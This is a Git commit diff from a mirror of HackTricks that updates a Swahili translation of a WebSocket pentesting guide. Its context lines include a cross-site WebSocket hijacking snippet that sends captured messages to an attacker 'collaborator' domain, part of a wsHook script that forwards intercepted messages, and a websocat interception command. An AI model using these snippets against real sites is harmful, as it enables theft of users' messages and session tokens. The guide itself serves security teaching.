maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/websocket-attacks.md'] to sw

Browse Source
This commit is contained in:
Translator 2025-03-09 14:31:29 +00:00
parent d5c0408a51
commit f72a804760
1 changed files with 13 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
src/pentesting-web/websocket-attacks.md
View File

@ -4,7 +4,7 @@
## What are WebSockets ## What are WebSockets
WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **latency ya chini au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja. WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **muda mfupi wa kuchelewesha au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja.
### Establishment of WebSocket Connections ### Establishment of WebSocket Connections
@ -26,7 +26,7 @@ Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2 Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket Upgrade: websocket
``` ```
Majibu ya mkono wa server: Majibu ya mkono wa mkono wa seva:
```javascript ```javascript
HTTP/1.1 101 Switching Protocols HTTP/1.1 101 Switching Protocols
Connection: Upgrade Connection: Upgrade
@ -63,17 +63,22 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
``` ```
### Websockets enumeration ### Websockets enumeration
Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kugundua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki. Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kuvumbua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki.
### Websocket Debug tools ### Websocket Debug tools
- **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP. - **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP.
- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora zaidi katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.** - [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kuchukua, kukamata, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva. - [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kukamata, kuingilia, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya pentesting. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya. - [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya penetration testing. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya.
- [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**. - [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.** - [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.**
## Decrypting Websocket
- [https://github.com/Anof-cyber/PyCript](https://github.com/Anof-cyber/PyCript)
- [https://github.com/Anof-cyber/PyCript-WebSocket/](https://github.com/Anof-cyber/PyCript-WebSocket/)
## Websocket Lab ## Websocket Lab
Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo. Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo.
@ -105,7 +110,7 @@ fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
``` ```
### Cross Origin + Cookie with a different subdomain ### Cross Origin + Cookie with a different subdomain
Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa inatumwa, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**. Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa **inatumwa**, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.
### Stealing data from user ### Stealing data from user
@ -129,7 +134,7 @@ xhttp.send()
return messageEvent return messageEvent
} }
``` ```
Sasa pakua faili `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\ Sasa pakua faili la `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\
Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket: Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket:
```javascript ```javascript
sudo python3 -m http.server 80 sudo python3 -m http.server 80